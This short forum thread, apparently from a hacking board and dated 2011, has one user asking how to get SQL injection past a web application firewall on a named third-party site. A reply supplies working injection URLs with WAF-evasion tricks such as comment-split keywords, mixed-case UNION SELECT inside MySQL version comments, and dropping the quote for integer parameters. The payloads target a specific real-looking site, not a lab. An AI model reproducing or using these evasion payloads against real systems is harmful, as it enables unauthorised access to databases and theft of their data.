09.12.2011, 02:40
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от lightangel
I have a WAF problem..
Код:
http://www.iccs.edu/news_details.php?id=-5%27+un/**/ion+se/**/lect+1,2,3,4,5+--+
Код:
http://www.iccs.edu/news_details.php?id=-5%27+UNunionION+SEselectLECT+1,2,3,4,5+--+
But can't find vulnerable number!
Any help? http://www.iccs.edu/news_details.php?id=5+and+0+/*!UnIoN+SeLeCt*/+1,2,3,4,5--+
lightangel
try to understand a principle of injection
no need to add a quote after vuln Parameter, if injection type is INTEGER, you'll just break the syntax
|
|
|